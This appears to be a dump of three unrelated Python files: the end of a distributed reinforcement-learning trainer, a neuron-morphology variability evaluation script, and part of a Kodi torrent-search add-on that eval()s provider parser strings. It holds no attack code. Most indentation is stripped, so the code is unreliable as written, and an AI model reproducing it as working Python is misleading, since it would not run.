agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
latest_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
latest_win_rate = win_rate
agent.net.save_latest_policy()
return max_win_rate, latest_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
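    # Resulting cluster layout, e.g. with the default port 9770 and PARALLEL=2:
    #   {"ps": ["localhost:9770"], "worker": ["localhost:9771", "localhost:9772"]}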
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Best Win_rate:', max_win_rate)
print('Latest Win_rate:', latest_win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
eval_variability.py
|
import sys
import os
import multiprocessing as mp
import ctypes
import numpy as np
import util
import util_morphology
import util_meta
import util_feature_IO
import util_geometry
import constants
def createMorphologyFile(networkDir, morphologyFile):
graphset = util_morphology.loadGraphset(networkDir)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
nids = list(graphset.keys())
nids.sort()
with open(morphologyFile, "w+") as f:
f.write("neuron_id,dendrite_file,axon_file\n")
for nid in nids:
synapticSide = neurons[nid]["synaptic_side"]
if synapticSide in [0, 2]:
idx = len(graphset[nid])-1
axonFile = os.path.basename(graphset[nid][idx]["file"])
else:
axonFile = "n/a"
if synapticSide in [1, 2]:
dendriteFile = os.path.basename(graphset[nid][0]["file"])
else:
dendriteFile = "n/a"
f.write("{},{},{}\n".format(nid, dendriteFile, axonFile))
def getMorphologyDescriptor(filepath):
if(filepath == "n/a"):
return filepath
else:
return os.path.basename(filepath)
def excludePreNeuron(axonDescriptor, column, columnDescriptors):
colDescriptor = axonDescriptor.split("_registered_")[1].replace(".am", "").replace("_stripped", "")
columnDescriptors.add(colDescriptor)
return column != colDescriptor
def createMorphologyIndex(morphologyFile, nids, neurons, regions, synapticSide):
column_celltype_morphology = {} # (column, cellType) -> {morphology}
neuron_morphology = {} # nid -> morphology
nids = set(nids)
nidsFiltered = set()
columnDescriptors = set()
with open(morphologyFile) as f:
lines = f.readlines()
for i in range(1, len(lines)):
parts = lines[i].rstrip().split(",")
nid = int(parts[0])
if(nid in nids):
dendriteDescriptor = getMorphologyDescriptor(parts[1])
axonDescriptor = getMorphologyDescriptor(parts[2])
regionId = neurons[nid]["region"]
regionName = regions[regionId]["name"]
column = util_meta.getRegionDisplayName(regionName)
cellType = neurons[nid]["cell_type"]
if(synapticSide == "post" or not excludePreNeuron(axonDescriptor, column, columnDescriptors)):
nidsFiltered.add(nid)
if((column, cellType) not in column_celltype_morphology):
column_celltype_morphology[(column, cellType)] = set()
if(synapticSide == "post"):
column_celltype_morphology[(column, cellType)].add(dendriteDescriptor)
neuron_morphology[nid] = dendriteDescriptor
else:
column_celltype_morphology[(column, cellType)].add(axonDescriptor)
neuron_morphology[nid] = axonDescriptor
numMorphologies = []
numMorphologies_keys = []
for column_celltype, morphologies in column_celltype_morphology.items():
numMorphologies_keys.append(column_celltype)
numMorphologies.append(len(morphologies))
    print("columnDescriptors", columnDescriptors)
idx = np.argmax(numMorphologies)
maxMorphologies = numMorphologies[idx]
print("column ct max morphologies", column_celltype_morphology[numMorphologies_keys[idx]])
print("num max morphologies", maxMorphologies, numMorphologies_keys[idx])
nidsFiltered = list(nidsFiltered)
nidsFiltered.sort()
return column_celltype_morphology, neuron_morphology, maxMorphologies, nidsFiltered
def generateMultiplicitiesForNumMorphologies(nids, neurons, column_celltype_morphology, neuron_morphology, numMorphologies, maxMorphologies, maxRealizations):
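    # For each realization, a random subset of `numMorphologies` morphologies is
    # enabled per (column, cell type) group. Neurons whose morphology is disabled
    # get multiplicity 0, and their count is redistributed over the enabled
    # neurons of the same group (evenly, plus a random remainder via divmod).
    # Note: relies on the module-level `regions` loaded in the __main__ block.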
    multiplicities = []  # one dict per realization: neuronId -> multiplicity
combinations = util.nCr(maxMorphologies, numMorphologies)
print("------")
print(numMorphologies, maxMorphologies, combinations, maxRealizations)
print("col-ct", len(column_celltype_morphology))
for k in range(0, maxRealizations):
currentMultiplicities = {}
enabledMorphologies = {}
for column_cellType, morphologies in column_celltype_morphology.items():
enabledMorphologies[column_cellType] = util.getRandomSubset(morphologies, numMorphologies)
enabledIndex = {} # (column, cellType) -> [nid]
disabledIndex = {} # (column, cellType) -> disabledCount
for nid in nids:
regionId = neurons[nid]["region"]
regionName = regions[regionId]["name"]
column = util_meta.getRegionDisplayName(regionName)
cellType = neurons[nid]["cell_type"]
morphology = neuron_morphology[nid]
if((column, cellType) not in enabledIndex):
enabledIndex[(column, cellType)] = []
disabledIndex[(column, cellType)] = 0
if(morphology in enabledMorphologies[(column, cellType)]):
currentMultiplicities[nid] = 1
enabledIndex[(column, cellType)].append(nid)
else:
currentMultiplicities[nid] = 0
disabledIndex[(column, cellType)] += 1
for column_cellType, reassignCount in disabledIndex.items():
if(reassignCount):
enabledIds = enabledIndex[(column_cellType)]
a, b = np.divmod(reassignCount, len(enabledIds))
for nid in enabledIds:
currentMultiplicities[nid] += a
enabledIdsSubset = util.getRandomSubset(set(enabledIds), b)
for nid in enabledIdsSubset:
currentMultiplicities[nid] += 1
multiplicities.append(currentMultiplicities)
print("generated realization: {} {}".format(numMorphologies, k))
return multiplicities
def getMaxNumRealizations(multiplicities):
numRealizations = []
for realizations in multiplicities.values():
numRealizations.append(len(realizations))
return np.max(numRealizations)
def initArrays(outProps, maxNumRealizations):
numCells = outProps["gridBounds"]["numCells"]
for i in range(0, maxNumRealizations):
outProps["lengthArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["lengthArrayLocks"].append(mp.Lock())
outProps["contributingArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["contributingArrayLocks"].append(mp.Lock())
outProps["boutonArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["boutonArrayLocks"].append(mp.Lock())
outProps["branchesArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["branchesArrayLocks"].append(mp.Lock())
outProps["pathSomaArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["pathSomaArrayLocks"].append(mp.Lock())
outProps["cellTypeArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["cellTypeArrayLocks"].append(mp.Lock())
def clearArrays(outProps):
numCells = outProps["gridBounds"]["numCells"]
for lengthArray in outProps["lengthArrays"]:
for i in range(0, numCells):
lengthArray[i] = 0
for contributingArray in outProps["contributingArrays"]:
for i in range(0, numCells):
contributingArray[i] = 0
for boutonArray in outProps["boutonArrays"]:
for i in range(0, numCells):
boutonArray[i] = 0
for branchesArray in outProps["branchesArrays"]:
for i in range(0, numCells):
branchesArray[i] = 0
for pathSomaArray in outProps["pathSomaArrays"]:
for i in range(0, numCells):
pathSomaArray[i] = 0
for cellTypeArray in outProps["cellTypeArrays"]:
for i in range(0, numCells):
cellTypeArray[i] = 2**20
def writeCubeStats(outfolder, numMorphologies, numRealizations, outProps, synapticSide):
numCells = outProps["gridBounds"]["numCells"]
gridBounds = outProps["gridBounds"]
for k in range(0, numRealizations):
filename = os.path.join(outfolder, "{}_morphologies-{}_realization-{}".format(synapticSide, numMorphologies, k))
lengthArray = outProps["lengthArrays"][k]
contributingArray = outProps["contributingArrays"][k]
boutonsArray = outProps["boutonArrays"][k]
branchesArray = outProps["branchesArrays"][k]
pathSomaArray = outProps["pathSomaArrays"][k]
cellTypesArray = outProps["cellTypeArrays"][k]
with open(filename, "w+") as f:
f.write("ix,iy,iz,length,contributing_cells,boutons,branches,path_soma_sum,cell_types\n")
for i in range(0, numCells):
ixiyiz = util_geometry.getCubeFromArrayIndex(gridBounds, i)
length = lengthArray[i]
contributingCells = contributingArray[i]
boutons = boutonsArray[i]
branches = branchesArray[i]
pathSoma = pathSomaArray[i]
cellTypes = getCellTypes(cellTypesArray[i])
f.write("{},{},{},{:.1f},{},{:.1f},{},{:.1f},{}\n".format(ixiyiz[0], ixiyiz[1], ixiyiz[2], length, contributingCells, boutons, branches, pathSoma, cellTypes))
print("written {} {}".format(numMorphologies, k))
def setCellType(intRep, ct):
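    # Sets bit `ct` (value 2**ct) in the integer-encoded cell-type bit field.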
bitstring = list("{:b}".format(intRep))
bitstring[len(bitstring)-ct-1] = "1"
return int("".join(bitstring), 2)
def getCellTypes(intRep):
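    # Despite the name, this returns the *count* of cell-type bits (0..11) that
    # are set; bit 20 acts as a padding/sentinel bit written by clearArrays.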
total = 0
bitstring = list("{:b}".format(intRep))
for ct in range(0, 12):
total += int(bitstring[len(bitstring) - ct - 1] == "1")
return total
def registerCubeStatsBatch(batchIndex, outProps, networkDir, nids, multiplicities, synapticSide):
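    # Worker process entry point: for every neuron in this batch, read its
    # per-cube subcellular features once, then add multiplicity-weighted
    # length/bouton/branch/path-to-soma contributions to the shared arrays of
    # each realization in which the neuron is enabled, under per-array locks.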
gridDescriptor = "50-50-50"
gridBounds = outProps["gridBounds"]
ixiyiz_min = gridBounds["ixiyiz_min"]
ixiyiz_max = gridBounds["ixiyiz_max"]
numRealizations = len(multiplicities)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
for i in range(0, len(nids)):
nid = nids[i]
cellType = neurons[nid]["cell_type"]
cubeStats = {} # arrayIndex -> {}
if(synapticSide == "pre"):
filename = os.path.join(networkDir, "subcellular_features_presynaptic_{}_all".format(gridDescriptor), "{}.csv".format(nid))
features = util_feature_IO.readAxonFeatures(filename)
if(not features):
print("no features", nid, filename)
else:
filename = os.path.join(networkDir, "subcellular_features_postsynaptic_{}_all".format(gridDescriptor), "{}.csv".format(nid))
features = util_feature_IO.readDendriteFeatures(filename)
if(features):
for ixiyiz, branches in features.items():
if(util_geometry.indicesInBounds(ixiyiz, ixiyiz_min, ixiyiz_max)):
                    arrayIndex = util_geometry.getArrayIndex(gridBounds, ixiyiz)
length = 0
numBranches = 0
boutons = 0
pathSoma = 0
for branch in branches:
length += branch["length"]
numBranches += 1
if(synapticSide == "pre"):
boutons += branch["boutons"]
pathSoma += branch["distSoma"]
                    cubeStats[arrayIndex] = {
"length": length,
"boutons": boutons,
"branches": numBranches,
"pathSoma": pathSoma
}
for k in range(0, numRealizations):
multiplicity = multiplicities[k][nid]
if(multiplicity):
lengthArray = outProps["lengthArrays"][k]
lengthArrayLock = outProps["lengthArrayLocks"][k]
contributingArray = outProps["contributingArrays"][k]
contributingArrayLock = outProps["contributingArrayLocks"][k]
boutonArray = outProps["boutonArrays"][k]
boutonArrayLock = outProps["boutonArrayLocks"][k]
branchesArray = outProps["branchesArrays"][k]
branchesArrayLock = outProps["branchesArrayLocks"][k]
pathSomaArray = outProps["pathSomaArrays"][k]
pathSomaArrayLock = outProps["pathSomaArrayLocks"][k]
cellTypeArray = outProps["cellTypeArrays"][k]
cellTypeArrayLock = outProps["cellTypeArrayLocks"][k]
lengthArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
lengthArray[arrayIndex] += multiplicity * stats["length"]
lengthArrayLock.release()
contributingArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
contributingArray[arrayIndex] += multiplicity
contributingArrayLock.release()
boutonArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
boutonArray[arrayIndex] += multiplicity * stats["boutons"]
boutonArrayLock.release()
branchesArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
branchesArray[arrayIndex] += multiplicity * stats["branches"]
branchesArrayLock.release()
pathSomaArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
pathSomaArray[arrayIndex] += multiplicity * stats["pathSoma"]
pathSomaArrayLock.release()
cellTypeArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
intRep = cellTypeArray[arrayIndex]
cellTypeArray[arrayIndex] = setCellType(intRep, cellType)
cellTypeArrayLock.release()
if((i+1) % 50 == 0):
print("batch {}: processed {}/{}".format(batchIndex, i+1, len(nids)))
def computeCubeStats(networkDir, outfolder, nids, numMorphologies, realizations, synapticSide, numWorkers, outProps):
batches = np.array_split(nids, numWorkers)
clearArrays(outProps)
processes = []
for i in range(0, len(batches)):
p = mp.Process(target=registerCubeStatsBatch, args=(i, outProps, networkDir, batches[i], realizations, synapticSide))
p.start()
processes.append(p)
for p in processes:
p.join()
writeCubeStats(outfolder, numMorphologies, len(realizations), outProps, synapticSide)
def filterExc(nids, neurons):
nidsFiltered = []
for nid in nids:
if(neurons[nid]["cell_type"] != 11):
nidsFiltered.append(nid)
return nidsFiltered
def getGridBounds_ref_volume(networkDir):
boxMin, boxMax = constants.getReferenceVolume()
util_geometry.setGridSize("50-50-50")
gridBounds = util_geometry.getGridBounds(boxMin, boxMax)
return gridBounds
def printUsageAndExit():
print("eval_variability.py network-dir mode [num-workers]")
print()
exit()
if __name__ == "__main__":
numArgs = len(sys.argv)
if(numArgs not in [3, 4]):
printUsageAndExit()
networkDir = sys.argv[1]
mode = sys.argv[2]
if(numArgs == 4):
numWorkers = int(sys.argv[3])
else:
numWorkers = mp.cpu_count()
maxNumRealizations = 500
util.makeDir(os.path.join(networkDir, "eval"))
outfolder = os.path.join(networkDir, "eval", "variability")
util.makeDir(outfolder)
batchFolder = os.path.join(outfolder, mode)
util.makeCleanDir(batchFolder)
morphologyFile = os.path.join(outfolder, "morphology_mapping.csv")
if(not os.path.exists(morphologyFile)):
createMorphologyFile(networkDir, morphologyFile)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
regions = util_meta.loadRegions(os.path.join(networkDir, "regions.csv"))
if(mode == "pre"):
nids = np.loadtxt(os.path.join(networkDir, "innervating_ref-volume_{}.txt".format("pre")), dtype=int)
nids = filterExc(nids, neurons)
elif(mode == "post"):
nids = np.loadtxt(os.path.join(networkDir, "innervating_ref-volume_{}.txt".format("post")), dtype=int)
nids = filterExc(nids, neurons)
else:
raise ValueError(mode)
column_celltype_morphology, neuron_morphology, maxMorphologies, nidsFiltered = createMorphologyIndex(morphologyFile, nids, neurons, regions, mode)
print(mode, len(nids), len(nidsFiltered), "max morphologies", maxMorphologies)
# init shared arrays
gridBounds = getGridBounds_ref_volume(networkDir)
    print("gridBounds", gridBounds)
outProps = {
"gridBounds": gridBounds,
"lengthArrays": [],
"lengthArrayLocks": [],
"contributingArrays": [],
"contributingArrayLocks": [],
"boutonArrays": [],
"boutonArrayLocks": [],
"branchesArrays": [],
"branchesArrayLocks": [],
"pathSomaArrays": [],
"pathSomaArrayLocks": [],
"cellTypeArrays": [],
"cellTypeArrayLocks": []
}
initArrays(outProps, maxNumRealizations)
for numMorphologies in range(1, maxMorphologies + 1):
realizations = generateMultiplicitiesForNumMorphologies(nidsFiltered, neurons, column_celltype_morphology, neuron_morphology, numMorphologies, maxMorphologies, maxNumRealizations)
computeCubeStats(networkDir, batchFolder, nidsFiltered, numMorphologies, realizations, mode, numWorkers, outProps)
|
burst.py
|
# -*- coding: utf-8 -*-
"""
Burst processing thread
"""
from __future__ import unicode_literals
from future.utils import PY3, iteritems
import re
import json
import time
from threading import Thread
from elementum.provider import append_headers, get_setting, log
if PY3:
from queue import Queue
from urllib.parse import urlparse
from urllib.parse import unquote
basestring = str
long = int
else:
from Queue import Queue
from urlparse import urlparse
from urllib import unquote
from .parser.ehp import Html
from kodi_six import xbmc, xbmcgui, xbmcaddon, py2_encode
from .provider import process
from .providers.definitions import definitions, longest
from .filtering import apply_filters, Filtering
from .client import USER_AGENT, Client
from .utils import ADDON_ICON, notify, translation, sizeof, get_icon_path, get_enabled_providers, get_alias
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
auto_timeout = get_setting("auto_timeout", bool)
timeout = get_setting("timeout", int)
special_chars = "()\"':.[]<>/\\?"
elementum_timeout = 0
elementum_addon = xbmcaddon.Addon(id='plugin.video.elementum')
if elementum_addon:
if elementum_addon.getSetting('custom_provider_timeout_enabled') == "true":
elementum_timeout = int(elementum_addon.getSetting('custom_provider_timeout'))
else:
elementum_timeout = 30
log.info("Using timeout from Elementum: %d seconds" % (elementum_timeout))
# Make sure timeout is always less than the one from Elementum.
if auto_timeout:
timeout = elementum_timeout - 3
elif elementum_timeout > 0 and timeout > elementum_timeout - 3:
log.info("Redefining timeout to be less than Elementum's: %d to %d seconds" % (timeout, elementum_timeout - 3))
timeout = elementum_timeout - 3
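# For example, with Elementum's timeout at 30 seconds the effective provider
# timeout used below becomes 27 seconds.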
def search(payload, method="general"):
""" Main search entrypoint
Args:
payload (dict): Search payload from Elementum.
method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
Returns:
list: All filtered results in the format Elementum expects
"""
log.debug("Searching with payload (%s): %s" % (method, repr(payload)))
if method == 'general':
if 'query' in payload:
payload['title'] = payload['query']
payload['titles'] = {
'source': payload['query']
}
else:
payload = {
'title': payload,
'titles': {
'source': payload
},
}
payload['titles'] = dict((k.lower(), v) for k, v in iteritems(payload['titles']))
# If titles[] exists in payload and there are special chars in titles[source]
# then we set a flag to possibly modify the search query
payload['has_special'] = 'titles' in payload and \
bool(payload['titles']) and \
'source' in payload['titles'] and \
any(c in payload['titles']['source'] for c in special_chars)
if payload['has_special']:
log.debug("Query title contains special chars, so removing any quotes in the search query")
if 'proxy_url' not in payload:
payload['proxy_url'] = ''
if 'internal_proxy_url' not in payload:
payload['internal_proxy_url'] = ''
if 'elementum_url' not in payload:
payload['elementum_url'] = ''
if 'silent' not in payload:
payload['silent'] = False
if 'skip_auth' not in payload:
payload['skip_auth'] = False
global request_time
global provider_names
global provider_results
global available_providers
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
providers = get_enabled_providers(method)
if len(providers) == 0:
if not payload['silent']:
notify(translation(32060), image=get_icon_path())
log.error("No providers enabled")
return []
log.info("Burstin' with %s" % ", ".join([definitions[provider]['name'] for provider in providers]))
if get_setting('kodi_language', bool):
kodi_language = xbmc.getLanguage(xbmc.ISO_639_1)
if not kodi_language:
log.warning("Kodi returned empty language code...")
elif 'titles' not in payload or not payload['titles']:
log.info("No translations available...")
elif payload['titles'] and kodi_language not in payload['titles']:
log.info("No '%s' translation available..." % kodi_language)
p_dialog = xbmcgui.DialogProgressBG()
if not payload['silent']:
p_dialog.create('Elementum [COLOR FFFF6B00]Burst[/COLOR]', translation(32061))
for provider in providers:
available_providers += 1
provider_names.append(definitions[provider]['name'])
task = Thread(target=run_provider, args=(provider, payload, method))
task.start()
providers_time = time.time()
total = float(available_providers)
    # Exit as soon as all providers have returned results or the timeout is reached; poll every 250 ms
while time.time() - providers_time < timeout and available_providers > 0:
timer = time.time() - providers_time
log.debug("Timer: %ds / %ds" % (timer, timeout))
if timer > timeout:
break
message = translation(32062) % available_providers if available_providers > 1 else translation(32063)
if not payload['silent']:
p_dialog.update(int((total - available_providers) / total * 100), message=message)
time.sleep(0.25)
if not payload['silent']:
p_dialog.close()
del p_dialog
if available_providers > 0:
message = ', '.join(provider_names)
message = message + translation(32064)
log.warning(message)
if not payload['silent']:
notify(message, ADDON_ICON)
log.debug("all provider_results: %s" % repr(provider_results))
filtered_results = apply_filters(provider_results)
log.debug("all filtered_results: %s" % repr(filtered_results))
log.info("Providers returned %d results in %s seconds" % (len(filtered_results), round(time.time() - request_time, 2)))
return filtered_results
def got_results(provider, results):
""" Results callback once a provider found all its results, or not
Args:
provider (str): The provider ID
results (list): The list of results
"""
global provider_names
global provider_results
global available_providers
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
max_results = get_setting('max_results', int)
sort_by = get_setting('sort_by', int)
# 0 "Resolution"
# 1 "Seeds"
# 2 "Size"
# 3 "Balanced"
    if sort_by == 0:
        sorted_results = sorted(results, key=lambda r: (r['sort_resolution']), reverse=True)
    elif sort_by == 1:
        sorted_results = sorted(results, key=lambda r: (r['seeds']), reverse=True)
    elif sort_by == 2:
        sorted_results = sorted(results, key=lambda r: (r['size']), reverse=True)
    else:
        # 3 "Balanced" (also the fallback)
        # TODO: think of something interesting to balance sort results
        sorted_results = sorted(results, key=lambda r: (r['sort_balance']), reverse=True)
if len(sorted_results) > max_results:
sorted_results = sorted_results[:max_results]
log.info("[%s] >> %s returned %2d results in %.1f seconds%s" % (
provider, definition['name'].rjust(longest), len(results), round(time.time() - request_time, 2),
(", sending %d best ones" % max_results) if len(results) > max_results else ""))
provider_results.extend(sorted_results)
available_providers -= 1
if definition['name'] in provider_names:
provider_names.remove(definition['name'])
def extract_torrents(provider, client):
""" Main torrent extraction generator for non-API based providers
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
log.debug("[%s] Extracting torrents from %s using definitions: %s" % (provider, provider, repr(definition)))
if not client.content:
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Page content is empty" % provider)
        return  # end the generator with a bare return; raising StopIteration inside a generator is an error on Python 3.7+ (PEP 479)
dom = Html().feed(client.content)
key_search = get_search_query(definition, "key")
row_search = get_search_query(definition, "row")
name_search = get_search_query(definition, "name")
torrent_search = get_search_query(definition, "torrent")
info_hash_search = get_search_query(definition, "infohash")
size_search = get_search_query(definition, "size")
seeds_search = get_search_query(definition, "seeds")
peers_search = get_search_query(definition, "peers")
referer_search = get_search_query(definition, "referer")
log.debug("[%s] Parser: %s" % (provider, repr(definition['parser'])))
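    # The parser entries are provider-defined Python expressions (prefixed with
    # "dom." for key/table/row by get_search_query) that are eval()'d below
    # against the parsed page (`dom`) and, per row, against the matched `item`.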
q = Queue()
threads = []
needs_subpage = 'subpage' in definition and definition['subpage']
if needs_subpage:
def extract_subpage(q, name, torrent, size, seeds, peers, info_hash, referer):
try:
log.debug("[%s] Getting subpage at %s" % (provider, repr(torrent)))
except Exception as e:
import traceback
log.error("[%s] Subpage logging failed with: %s" % (provider, repr(e)))
                for line in traceback.format_exc().split("\n"):
                    log.debug(line)
# New client instance, otherwise it's race conditions all over the place
subclient = Client()
subclient.passkey = client.passkey
headers = {}
if "subpage_mode" in definition:
if definition["subpage_mode"] == "xhr":
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['Content-Language'] = ''
if referer:
headers['Referer'] = referer
uri = torrent.split('|') # Split cookies for private trackers
subclient.open(py2_encode(uri[0]), headers=headers)
if 'bittorrent' in subclient.headers.get('content-type', ''):
log.debug('[%s] bittorrent content-type for %s' % (provider, repr(torrent)))
if len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
else:
try:
torrent = extract_from_page(provider, subclient.content)
if torrent and not torrent.startswith('magnet') and len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
except Exception as e:
import traceback
log.error("[%s] Subpage extraction for %s failed with: %s" % (provider, repr(uri[0]), repr(e)))
                    for line in traceback.format_exc().split("\n"):
                        log.debug(line)
log.debug("[%s] Subpage torrent for %s: %s" % (provider, repr(uri[0]), torrent))
ret = (name, info_hash, torrent, size, seeds, peers)
q.put_nowait(ret)
if not dom:
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Could not parse DOM from page content" % provider)
        return  # bare return instead of raising StopIteration (PEP 479)
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Page content: %s" % (provider, client.content.replace('\r', '').replace('\n', '')))
key = eval(key_search) if key_search else ""
if key_search and get_setting("use_debug_parser", bool):
key_str = key.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'key', key_search, key_str.replace('\r', '').replace('\n', '')))
items = eval(row_search)
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched %d items for '%s' query '%s'" % (provider, len(items), 'row', row_search))
for item in items:
if get_setting("use_debug_parser", bool):
item_str = item.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'row', row_search, item_str.replace('\r', '').replace('\n', '')))
if not item:
continue
try:
name = eval(name_search) if name_search else ""
torrent = eval(torrent_search) if torrent_search else ""
size = eval(size_search) if size_search else ""
seeds = eval(seeds_search) if seeds_search else ""
peers = eval(peers_search) if peers_search else ""
info_hash = eval(info_hash_search) if info_hash_search else ""
referer = eval(referer_search) if referer_search else ""
if 'magnet:?' in torrent:
torrent = torrent[torrent.find('magnet:?'):]
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'name', name_search, name))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'torrent', torrent_search, torrent))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'size', size_search, size))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'seeds', seeds_search, seeds))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'peers', peers_search, peers))
if info_hash_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', info_hash_search, info_hash))
if referer_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', referer_search, referer))
# Pass client cookies with torrent if private
if not torrent.startswith('magnet'):
user_agent = USER_AGENT
if client.passkey:
torrent = torrent.replace('PASSKEY', client.passkey)
elif client.token:
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
else:
parsed_url = urlparse(torrent.split('|')[0])
cookie_domain = '{uri.netloc}'.format(uri=parsed_url)
cookie_domain = re.sub('www\d*\.', '', cookie_domain)
cookies = []
for cookie in client._cookies:
if cookie_domain in cookie.domain:
cookies.append(cookie)
headers = {}
if cookies:
headers = {'User-Agent': user_agent}
log.debug("[%s] Cookies res: %s / %s" % (provider, repr(headers), repr(client.request_headers)))
if client.request_headers:
headers.update(client.request_headers)
if client.url:
headers['Referer'] = client.url
headers['Origin'] = client.url
# Need to set Cookie afterwards to avoid rewriting it with session Cookies
headers['Cookie'] = ";".join(["%s=%s" % (c.name, c.value) for c in cookies])
else:
headers = {'User-Agent': user_agent}
torrent = append_headers(torrent, headers)
if name and torrent and needs_subpage and not torrent.startswith('magnet'):
if not torrent.startswith('http'):
torrent = definition['root_url'] + py2_encode(torrent)
t = Thread(target=extract_subpage, args=(q, name, torrent, size, seeds, peers, info_hash, referer))
threads.append(t)
else:
yield (name, info_hash, torrent, size, seeds, peers)
except Exception as e:
log.error("[%s] Got an exception while parsing results: %s" % (provider, repr(e)))
if needs_subpage:
log.debug("[%s] Starting subpage threads..." % provider)
for t in threads:
t.start()
for t in threads:
t.join()
for i in range(q.qsize()):
ret = q.get_nowait()
log.debug("[%s] Queue %d got: %s" % (provider, i, repr(ret)))
yield ret
def extract_from_api(provider, client):
""" Main API parsing generator for API-based providers
An almost clever API parser, mostly just for YTS, RARBG and T411
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
try:
data = json.loads(client.content)
except:
data = []
log.debug("[%s] JSON response from API: %s" % (unquote(provider), repr(data)))
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
api_format = definition['api_format']
results = []
# If 'results' is empty - then we can try to take all the data as an array of results.
# Usable when api returns results without any other data.
if not api_format['results']:
results = data
else:
result_keys = api_format['results'].split('.')
log.debug("[%s] result_keys: %s" % (provider, repr(result_keys)))
for key in result_keys:
if key in data:
data = data[key]
else:
data = []
results = data
log.debug("[%s] results: %s" % (provider, repr(results)))
if 'subresults' in api_format:
from copy import deepcopy
for result in results: # A little too specific to YTS but who cares...
result['name'] = result[api_format['name']]
subresults = []
subresults_keys = api_format['subresults'].split('.')
for key in subresults_keys:
for result in results:
if key in result:
for subresult in result[key]:
sub = deepcopy(result)
sub.update(subresult)
subresults.append(sub)
results = subresults
log.debug("[%s] with subresults: %s" % (provider, repr(results)))
for result in results:
if not result or not isinstance(result, dict):
continue
name = ''
info_hash = ''
torrent = ''
size = ''
seeds = ''
peers = ''
if 'name' in api_format:
name = result[api_format['name']]
if 'description' in api_format:
if name:
name += ' '
name += result[api_format['description']]
if 'torrent' in api_format:
